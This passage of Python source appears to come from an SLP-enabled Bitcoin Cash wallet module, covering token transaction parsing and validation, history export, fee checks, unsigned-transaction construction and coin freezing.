if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
### SLP: Handle incoming SLP transaction outputs here
self.handleSlpTransaction(tx_hash, tx)
"""
Callers are expected to take lock(s). We take no locks
"""
def handleSlpTransaction(self, tx_hash, tx):
txouts = tx.outputs()
try:
slpMsg = SlpMessage.parseSlpOutputScript(txouts[0][1])
except SlpUnsupportedSlpTokenType as e:
token_type = 'SLP%d'%(e.args[0],)
for i, (_type, addr, _) in enumerate(txouts):
if _type == TYPE_ADDRESS and self.is_mine(addr):
self._slp_txo[addr][tx_hash][i] = {
'type': token_type,
'qty': None,
'token_id': None,
}
return
except (SlpParsingError, IndexError, OpreturnError):
return
if slpMsg.transaction_type == 'SEND':
token_id_hex = slpMsg.op_return_fields['token_id_hex']
# truncate outputs list
amounts = slpMsg.op_return_fields['token_output'][:len(txouts)]
for i, qty in enumerate(amounts):
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS and qty > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': qty,
}
elif slpMsg.transaction_type == 'GENESIS':
token_id_hex = tx_hash
try:
_type, addr, _ = txouts[1]
if _type == TYPE_ADDRESS:
if slpMsg.op_return_fields['initial_token_mint_quantity'] > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][1] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': slpMsg.op_return_fields['initial_token_mint_quantity'],
}
if slpMsg.op_return_fields['mint_baton_vout'] is not None:
i = slpMsg.op_return_fields['mint_baton_vout']
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS:
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': 'MINT_BATON',
}
except IndexError: # if too few outputs (compared to mint_baton_vout)
pass
elif slpMsg.transaction_type == "MINT":
token_id_hex = slpMsg.op_return_fields['token_id_hex']
try:
_type, addr, _ = txouts[1]
if _type == TYPE_ADDRESS:
if slpMsg.op_return_fields['additional_token_quantity'] > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][1] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': slpMsg.op_return_fields['additional_token_quantity'],
}
if slpMsg.op_return_fields['mint_baton_vout'] is not None:
i = slpMsg.op_return_fields['mint_baton_vout']
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS:
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': 'MINT_BATON',
}
except IndexError: # if too few outputs (compared to mint_baton_vout)
pass
elif slpMsg.transaction_type == 'COMMIT':
# ignore COMMIT transactions; they don't produce any tokens.
return
else:
raise RuntimeError(slpMsg.transaction_type)
# On receiving a new SEND, MINT, or GENESIS always add entry to token_types if wallet hasn't seen tokenId yet
if slpMsg.transaction_type in [ 'SEND', 'MINT', 'GENESIS' ]:
if slpMsg.transaction_type == 'GENESIS':
tokenid = tx_hash
else:
tokenid = slpMsg.op_return_fields['token_id_hex']
new_token = True
for k, v in self.tx_tokinfo.items():
try:
if v['token_id'] == tokenid:
new_token = False
except KeyError:
pass
if new_token and tokenid not in self.token_types:
tty = { 'class': 'SLP%d'%(slpMsg.token_type,),
'decimals': "?",
'name': 'unknown-' + tokenid[:6]
}
if slpMsg.token_type == 65:
tty['group_id'] = "?"
self.token_types[tokenid] = tty
# Always add entry to tx_tokinfo
tti = { 'type':'SLP%d'%(slpMsg.token_type,),
'transaction_type':slpMsg.transaction_type,
'token_id': token_id_hex,
'validity': 0,
}
self.tx_tokinfo[tx_hash] = tti
if self.is_slp: # Only start up validation if SLP enabled
self.slp_check_validation(tx_hash, tx)
def slp_check_validation(self, tx_hash, tx):
""" Callers are expected to take lock(s). We take no locks """
tti = self.tx_tokinfo[tx_hash]
try:
is_new = self.token_types[tti['token_id']]['decimals'] == '?'
except:
is_new = False
if tti['validity'] == 0 and tti['token_id'] in self.token_types and not is_new and tti['type'] in ['SLP1','SLP65','SLP129']:
def callback(job):
(txid,node), = job.nodes.items()
val = node.validity
tti['validity'] = val
if slp_gs_mgr.slp_validity_signal is not None:
slp_gs_mgr.slp_validity_signal.emit(txid, val)
if tti['type'] == 'SLP1':
job = self.slp_graph_0x01.make_job(tx, self, self.network,
debug=2 if is_verbose else 1, # set debug=2 here to see the verbose dag when running with -v
reset=False)
elif tti['type'] in ['SLP65', 'SLP129']:
job = self.slp_graph_0x01_nft.make_job(tx, self, self.network, nft_type=tti['type'],
debug=2 if is_verbose else 1, # set debug=2 here to see the verbose dag when running with -v
reset=False)
if job is not None:
job.add_callback(callback)
# This was commented out because it spammed the log so badly
# it impacted performance. SLP validation can create a *lot* of jobs!
#finalization_print_error(job, f"[{self.basename()}] Job for {tx_hash} type {tti['type']} finalized")
def rebuild_slp(self):
"""Wipe away old SLP transaction data and rerun on the entire tx set.
"""
with self.lock:
self._slp_txo = defaultdict(lambda: defaultdict(dict))
self.tx_tokinfo = {}
for txid, tx in self.transactions.items():
self.handleSlpTransaction(txid, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
self.txi.pop(tx_hash, None)
self.txo.pop(tx_hash, None)
self.tx_fees.pop(tx_hash, None)
self.tx_tokinfo[tx_hash] = {}
for addr, addrdict in self._slp_txo.items():
if tx_hash in addrdict: addrdict[tx_hash] = {}
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def get_slp_history(self, domain=None, validities_considered=(None,0,1)):
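"""Return a flattened SLP history across all tokens: a list of
(tx_hash, height, conf, timestamp, delta, token_id) tuples, sorted
newest-first by transaction position."""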
history = []
histories = self.get_slp_histories(domain=domain, validities_considered=validities_considered)
# Take separate token histories and flatten them, then sort them.
for token_id,t_history in histories.items():
for tx_hash, height, conf, timestamp, delta in t_history:
history.append((tx_hash, height, conf, timestamp, delta, token_id))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
return history
def get_slp_histories(self, domain=None, validities_considered=(0,1)):
# Based on get_history.
# We return a dict of histories, one history per token_id.
# get domain
if domain is None:
domain = self.get_addresses()
#1. Big iteration to find all deltas and put them in the right place.
token_tx_deltas = defaultdict(lambda: defaultdict(int)) # defaultdict of defaultdicts of ints :)
for addr in domain:
h = self.get_address_history(addr)
with self.lock:
addrslptxo = self._slp_txo[addr]
for tx_hash, height in h:
if tx_hash in self.pruned_txo.values():
continue
tti = self.tx_tokinfo.get(tx_hash)
if tti and tti['validity'] in validities_considered:
txdict = addrslptxo.get(tx_hash,{})
for idx,d in txdict.items():
if isinstance(d['qty'],int):
token_tx_deltas[d['token_id']][tx_hash] += d['qty'] # received!
# scan over all txi's, trying to find if they were tokens, which tokens, and how much
# (note that non-SLP txes can spend (burn) SLP --- and SLP of tokenA can burn tokenB)
for n, _ in self.txi.get(tx_hash, {}).get(addr, ()):
prevtxid, prevout_str = n.rsplit(':',1)
tti = self.tx_tokinfo.get(prevtxid)
if not (tti and tti['validity'] in validities_considered):
continue
prevout = int(prevout_str)
d = addrslptxo.get(prevtxid,{}).get(prevout,{})
if isinstance(d.get('qty',None),int):
token_tx_deltas[d['token_id']][tx_hash] -= d['qty'] # spent!
# 2. create history (no sorting needed since balances won't be computed)
histories = {}
for token_id, tx_deltas in token_tx_deltas.items():
history = histories[token_id] = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
# 3. At this point we could compute running balances, but let's not.
return histories
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
TxHistory = namedtuple("TxHistory", "tx_hash, height, conf, timestamp, amount, balance")
def get_history(self, domain=None, *, reverse=False):
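"""Return the BCH history over `domain` (default: all wallet addresses)
as a list of TxHistory tuples, each carrying the tx's net effect on the
wallet (`amount`) plus the running `balance` after that tx. The list is
oldest-first by default, newest-first when reverse=True."""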
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append(self.TxHistory(tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Note that the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
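# Illustrative usage (a sketch; argument values and names are assumptions):
#   rows = wallet.export_history(show_addresses=True,
#                                progress_callback=lambda frac: print(f"{frac:.0%}"))
#   for row in rows:
#       print(row['txid'], row['value'], row['balance'])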
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactions since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because of the Python lists, dicts, etc. they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab bch history
h = self.get_history(domain, reverse=True)
out = []
# grab slp history
_slp_h = self.get_slp_history(domain=domain, validities_considered=(None,0,1,2,3,4))
def fmt_slp_amt(v, decimals):
if v is None:
return '--'
if decimals == "?":
decimals = 0
return format_satoshis(v, decimal_point=int(decimals), is_diff=True)
def get_token_info(token_id):
return self.token_types.get(token_id, {
'class': '?',
'decimals': 0,
'name': 'unknown'
})
slp_h = dict((tx_hash, {
'value': fmt_slp_amt(delta, get_token_info(token_id)['decimals']),
'token_id': token_id,
'name': get_token_info(token_id)['name']
}) for tx_hash, _, _, _, delta, token_id in _slp_h)
def get_slp_tx(tx_hash):
if slp_h.get(tx_hash) is None:
return { 'value': '--', 'name': '--', 'token_id': '--' }
return slp_h.get(tx_hash)
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
slp_info = get_slp_tx(tx_hash)
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
'slp_value' : slp_info['value'],
'slp_name' : slp_info['name'],
'slp_token_id' : slp_info['token_id']
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr is None: continue
input_addresses.append(addr.to_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
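"""Return a (status, status_str) pair for the tx, where `status` is a
small int used for sorting/iconography (0-3 while unconfirmed, 4-9 for
1 to 6+ confirmations) and `status_str` is the human-readable form
(a TX_STATUS entry, or the formatted timestamp once confirmed)."""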
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 3, 'unknown'
fee = self.tx_fees.get(tx_hash)
# we disable fee estimates in BCH for now.
#if fee and self.network and self.network.config.has_fee_estimates():
# size = len(tx.raw)/2
# low_fee = int(self.network.config.dynfee(0)*size/1000)
# is_lowfee = fee < low_fee * 0.5
#else:
# is_lowfee = False
# and instead if it's less than 1.0 sats/B we flag it as low_fee
try:
# NB len(tx.raw) is 2x the byte size as it's hex encoded.
is_lowfee = int(fee) / (int(len(tx.raw)) / 2.0) < 1.0 # if less than 1.0 sats/B, complain. otherwise don't.
except (TypeError, ValueError): # If for some reason fee was None or invalid, just pass on through.
is_lowfee = False
# /
if height < 0:
status = 0
elif height == 0 and is_lowfee:
status = 1
elif height == 0:
status = 2
else:
status = 3
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = _(TX_STATUS[status]) if status < 4 else time_str
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def check_sufficient_slp_balance(self, slpMessage, config):
if self.is_slp:
if slpMessage.transaction_type == 'SEND':
total_token_out = sum(slpMessage.op_return_fields['token_output'])
valid_token_balance, _, _, valid_unfrozen_token_balance, _ = self.get_slp_token_balance(slpMessage.op_return_fields['token_id_hex'], config)
if total_token_out > valid_token_balance:
raise NotEnoughFundsSlp()
elif total_token_out > valid_unfrozen_token_balance:
raise NotEnoughUnfrozenFundsSlp()
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None, *, mandatory_coins=[]):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
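# Illustrative usage (a sketch; names and the amount are assumptions):
#   coins = wallet.get_spendable_coins(None, config)
#   outputs = [(TYPE_ADDRESS, recipient_addr, 100000)]
#   tx = wallet.make_unsigned_transaction(coins, outputs, config)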
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
for item in mandatory_coins:
self.add_input_info(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
change_addrs = [self.get_addresses()[0]]
assert all(isinstance(addr, Address) for addr in change_addrs)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr,
mandatory_coins=mandatory_coins)
else:
inputs = mandatory_coins + inputs
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If the user tries to pay an excessive fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes = tx.estimated_size()
fee_in_satoshis = tx.get_fee()
sats_per_byte = fee_in_satoshis / tx_in_bytes
if sats_per_byte > 50:
raise ExcessiveFee()
# Sort the inputs and outputs deterministically
if not mandatory_coins:
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def make_unsigned_transaction_for_bitcoinfiles(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info_for_bitcoinfiles(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
change_addrs = [inputs[0]['address']]
assert all(isinstance(addr, Address) for addr in change_addrs)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.CoinChooserPrivacy()
# determine if this transaction should utilize all available inputs
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If the user tries to pay an excessive fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes = tx.estimated_size()
fee_in_satoshis = tx.get_fee()
sats_per_byte = fee_in_satoshis / tx_in_bytes
if sats_per_byte > 50:
raise ExcessiveFee()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
""" Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. """
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: Union[str, dict, Set[str]]) -> Union[bool, Set[str]]:
""" 'coin' level frozen query. Note: this is set/unset independent of
address-level freezing.
`utxo` is a prevout:n string, or a dict as returned from get_utxos(),
in which case a bool is returned.
`utxo` may also be a set of prevout:n strings in which case a set is
returned which is the intersection of the internal frozen coin sets
and the `utxo` set. """
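# e.g. (illustrative): is_frozen_coin("<txid>:0") -> bool
#      is_frozen_coin(coin_dict_from_get_utxos) -> bool (also refreshes its flag)
#      is_frozen_coin({"<txid>:0", "<txid>:1"}) -> the frozen subset of that set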
assert isinstance(utxo, (str, dict, set))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
elif isinstance(utxo, set):
# set is returned
return (self.frozen_coins | self.frozen_coins_tmp) & utxo
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
def set_frozen_state(self, addrs, freeze):
"""Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable."""
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary=False):
"""Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
call to `set_frozen_coin_state(utxos, False)`, both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`."""
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add(utxo)
def discard(utxo):
self.frozen_coins.discard(utxo)
self.frozen_coins_tmp.discard(utxo)
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation(utxo)
ok += 1
elif isinstance(utxo, dict):
# Note: we could do an is_mine check here for each coin dict here,
# but since all code paths leading to this branch always pass valid
# coins that are "mine", we removed the check to save CPU cycles.
#
# So an O(M logN) algorithm becomes O(M) without the is_mine check,
# where M = number of coins and N = number of addresses.
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation(txo)
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def _slp_callback_on_status(self, event, *args):
if self.is_slp and args[0] == 'connected':
self.activate_slp()
def start_threads(self, network):
self.network = network
if self.network:
if self.is_slp:
# Note: it's important that SLP data structures are defined
# before the network (SPV/Synchronizer) callbacks are installed
# otherwise we may receive a tx from the network thread
# before SLP objects are properly constructed.
self.slp_graph_0x01 = slp_validator_0x01.shared_context
self.slp_graph_0x01_nft = slp_validator_0x01_nft1.shared_context_nft1
self.activate_slp()
self.network.register_callback(self._slp_callback_on_status, ['status'])
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
self.cashacct.start(self.network) # start cashacct network-dependent subsystem, network.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
